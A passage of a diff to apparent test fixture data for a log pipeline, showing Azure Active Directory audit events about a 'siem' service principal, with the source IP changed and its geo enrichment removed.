"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124925700Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3497,25 +3191,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3529,7 +3205,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -3665,7 +3341,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3677,12 +3353,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036170100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124932400Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3708,25 +3384,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3740,7 +3398,7 @@
 "ObjectId": "Not Available",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -3854,7 +3512,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3866,12 +3524,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036175400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae2